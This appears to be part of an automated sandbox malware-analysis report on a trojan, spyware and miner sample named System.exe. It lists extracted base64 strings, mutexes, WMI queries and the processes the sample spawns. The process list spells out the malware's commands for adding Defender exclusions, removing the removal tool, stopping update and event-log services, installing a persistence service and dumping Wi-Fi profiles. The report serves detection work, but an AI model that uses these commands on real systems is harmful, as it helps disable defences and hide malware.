              Source: System.exe, OqgAvotWAmldPWIcI.csBase64 encoded string: 'L2Mgc3RhcnQgL2IgcG93ZXJzaGVsbCDigJNFeGVjdXRpb25Qb2xpY3kgQnlwYXNzIFN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICci', 'U29mdHdhcmVcQ2xhc3Nlc1xtcy1zZXR0aW5nc1xTaGVsbFxPcGVuXGNvbW1hbmQ=', 'QUNnYktLOG8veWpmS084b1Z5ajJLRElvUVNpQUtFQW9KQ2dzS0E4b0pTZ2tLQUFvUUNocEtKSW96aWk5S1A4byt5Z3ZLQjRvQVNnZ0FBPT0=', 'QUNnQUtBQW9BQ2lKS0Iwb0V5aTdLT1FvZUNnaktFQW9BQ2dBS0FBb0FDZ0FLQ0FvR2lqMEtING9YeWdKS0NNb1FDZ0FLQUFvQUNnZ0FBPT0=', 'QUNnQUtBQW80Q2p6S01Zb0ZDZ0pLQThvL3loRUtMRW81Q2lFS01Bb3BDajBLRWNvOENoZktLa29BU2dnS0hRb2Z5aEVLQUFvQUNnZ0FBPT0=', 'QUNnQUtLQW9BU2lBS0E0b0FDZ0FLQmdvL0NoL0tEc29HU2pOS01Bb1BDZzVLRjhvL3lqRUtNTW9BQ2dBS0Jnb1JDZ0lLRVFvQUNnZ0FBPT0=', 'QUNnQUtBY29nQ2pzS1BZbzdDaHJLSXNvZkNpM0tGY29nQ2lYS0Frb0p5aEFLTW9vdUNqbktORW85Q2p0S1BRbzlDaEVLRGdvQUNnZ0FBPT0=', 'QUNpNEtBQW9DQ2dKS0Jzb055aitLUDhveHlqdktPY295eWlKS0gwb0RTaVpLUDBvemlqL0tQOG9KeWdmS0Fzb0FTaEdLQUFvUkNnZ0FBPT0=', 'QUNpNEtJQW9RQ2dBS0lBb1lDZ1lLSWtvZnlqL0tQOG8veWhXS0FFb3NDai9LUDhvL3lqL0tFZ29FU2dpS01Bb0FDam5LRUFvUnlnZ0FBPT0=', 'QUNnWUtFNG9EeWdXS0JNb0VpZ1NLRG9vL3loSUtMY29neWdCS0FBb0RpZzhLSDRveVNqL0tBY29BQ2dBS0Fnb2dTZ0pLS3NvQUNnZ0FBPT0=', 'QUNnQUtLRW9BQ2dRS0VBb0FDZ0FLQUFvT1NqL0tPNG9JaWhIS0FBb3VDZ1FLUFVvdnlnTEtBQW9BQ2dBS0FBb0JpZ0FLRXdvQUNnZ0FBPT0=', 'QUNnQUtBQW9veWdBS0Fnb2hDZ0FLQUFvQUNnSUtCa29SeWhHS0JBb3VDaTRLQXNvQVNnQUtBQW9BQ2dBS0Fvb0FDaGNLQUFvQUNnZ0FBPT0=', 'QUNnQUtBQW9BQ2dSS01Rb0FDZ1JLSVFvUUNnQUtBQW8veWptS09RbzlDaitLQUFvQUNnQUtFQW9FQ2dCS09Bb0NpZ0FLQUFvQUNnZ0FBPT0=', 'QUNnQUtBQW9BQ2dBS0Fnb0VpaWtLSDhvQ0NnUUtBQW9OQ2l0S1A4bzdTZ3VLQUFvRWlncEtQNG9aQ2dhS0FFb0FDZ0FLQUFvQUNnZ0FBPT0=', 'QUNnQUtBQW9BQ2dBS0FBb0FDZ0FLQWdvRUNnQUtDUW9BQ2lJS1BZb1dDZ0FLQ1FvRkNnQ0tBRW9BQ2dBS0FBb0FDZ0FLQUFvQUNnZ0FBPT0=', 'QUNnQUtBQW9BQ2dBS0FBb0FDZ0FLQUFvQUNnQUtBQW9BQ2dBS0Jrb0FDZ0FLQUFvQUNnQUtBQW9BQ2dBS0FBb0FDZ0FLQUFvQUNnZ0FDQUE=', 'Q1FBSkFEM1lzOXdnQUVNQWNnQmxBR1FBYVFCMEFFTUFZUUJ5QUdRQWN3QTZBQ0FB', 'Q1FBSkFEM1lGdDBnQUVJQWJ3QnZBR3NBYlFCaEFISUFhd0J6QURvQUlBQT0=', 'Q1FBSkFEM1k1dHdnQUVRQWJ3QjNBRzRBYkFCdkFHRUFaQUJ6QURvQUlBQT0=', 'Q1FBSkFEellxTjhnQUZJQVpRQnpBSFFBYndCeUFHVUFWQUJ2QUdzQVpRQnVBSE1BT2dBZ0FBPT0=', 'Q1FBSkFEN1l5dDBnQUZjQVlRQnNBR3dBWlFCMEFITUFPZ0FnQUE9PQ==', 'Q1FCRUp3LytJQUJYQUdFQWJBQnNBR1VBZEFCekFDQUFRUUJ3QUhBQU9nQWdBQT09', 'Q1FBKzJLTGRJQUJRQUdrQVpBQm5BR2tBYmdBZ0FFRUFjQUJ3QURvQUlBQT0=', 'Q1FBOTJIN2NJQUJFQUdrQWN3QmpBRzhBY2dCa0FDQUFWQUJ2QUdzQVpRQnVBSE1BT2dBZ0FBPT0=', 'Q1FBSUp3LytJQUJVQUdVQWJBQmxBR2NBY2dCaEFHMEFJQUJ6QUdVQWN3QnpBR2tBYndCdUFITUE=', 'Q1FBQkpnLytJQUJUQUdzQWVRQndBR1VBSUFCekFHVUFjd0J6QUdrQWJ3QnVBQT09', 'Q1FBOTJIN2NJQUJFQUdrQWN3QmpBRzhBY2dCa0FDQUFkQUJ2QUdzQVpRQnVBQT09', 'Q1FBOTJLM2NJQUJUQUdrQVp3QnVBR0VBYkFBZ0FITUFaUUJ6QUhNQWFRQnZBRzRB', 'Q1FBODJLN2ZJQUJUQUhRQVpRQmhBRzBBSUFCekFHVUFjd0J6QUdrQWJ3QnVBQT09', 'Q1FBODJLN2ZJQUJWQUhBQWJBQmhBSGtBSUFCekFHVUFjd0J6QUdrQWJ3QnVBQT09', 'Q1FDWkpnLytJQUJRQUhJQWJ3QmpBR1VBY3dCekFHVUFjd0E2QUNBQQ==', 'W1x3LV17MjQsMjZ9XC5bXHctXXs2fVwuW1x3LV17MjUsMTEwfXxtZmFcLlthLXpBLVowLTlfXC1dezg0fQ==', 'U29mdHdhcmVcTWljcm9zb2Z0XE9mZmljZVwxNS4wXE91dGxvb2tcUHJvZmlsZXNcT3V0bG9va1w5Mzc1Q0ZGMDQxMzExMWQzQjg4QTAwMTA0QjJBNjY3Ng==', 'U29mdHdhcmVcTWljcm9
              Source: classification engineClassification label: mal100.troj.spyw.evad.mine.winEXE@99/15@4/4
              Source: C:\Users\user\Desktop\System.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\System.exe.logJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1392:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8292:304:WilStaging_02
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8676:304:WilStaging_02
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5620:304:WilStaging_02
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8656:304:WilStaging_02
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9000:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8680:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8676:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4228:304:WilStaging_02
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5620:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8108:304:WilStaging_02
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5148:304:WilStaging_02
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8656:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8112:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2000:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5128:304:WilStaging_02
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8108:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8216:304:WilStaging_02
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9172:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9172:304:WilStaging_02
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8888:304:WilStaging_02
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9124:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8772:304:WilStaging_02
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9000:304:WilStaging_02
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8388:304:WilStaging_02
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8940:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9016:304:WilStaging_02
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8216:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1392:304:WilStaging_02
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9080:304:WilStaging_02
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9080:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2000:304:WilStaging_02
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8772:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5128:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8680:304:WilStaging_02
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3012:304:WilStaging_02
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8836:304:WilStaging_02
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8836:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8672:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8388:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8584:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8784:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8584:304:WilStaging_02
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8112:304:WilStaging_02
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4228:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8672:304:WilStaging_02
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9016:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8888:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8292:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3012:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5148:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9124:304:WilStaging_02
              Source: C:\Windows\System32\svchost.exeMutant created: \BaseNamedObjects\Global\gqtqycqfuazktexq
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8784:304:WilStaging_02
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8940:304:WilStaging_02
              Source: C:\Users\user\Desktop\System.exeFile created: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeJump to behavior
              Source: System.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: System.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
              Source: C:\Users\user\Desktop\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
              Source: C:\Users\user\Desktop\System.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\System.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Users\user\Desktop\System.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\System.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: System.exe, 00000000.00000002.295346194625.00000176A08C1000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A080F000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A07ED000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE benefit_merchant_domains (benefit_id VARCHAR NOT NULL, merchant_domain VARCHAR NOT NULL)U;
              Source: System.exe, 00000000.00000002.295340608074.0000017690C9C000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295340608074.0000017690C3D000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295359123359.00000176A9474000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: System.exe, 00000000.00000002.295346194625.00000176A04AB000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A08C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
              Source: System.exeReversingLabs: Detection: 67%
              Source: System.exeVirustotal: Detection: 45%
              Source: unknownProcess created: C:\Users\user\Desktop\System.exe "C:\Users\user\Desktop\System.exe"
              Source: C:\Users\user\Desktop\System.exeProcess created: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe "C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe"
              Source: C:\Users\user\Desktop\System.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr All
              Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
              Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
              Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
              Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
              Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
              Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
              Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "NUOIJWEW"
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "NUOIJWEW" binpath= "C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exe" start= "auto"
              Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
              Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "NUOIJWEW"
              Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exe C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exe
              Source: C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
              Source: C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
              Source: C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
              Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
              Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
              Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
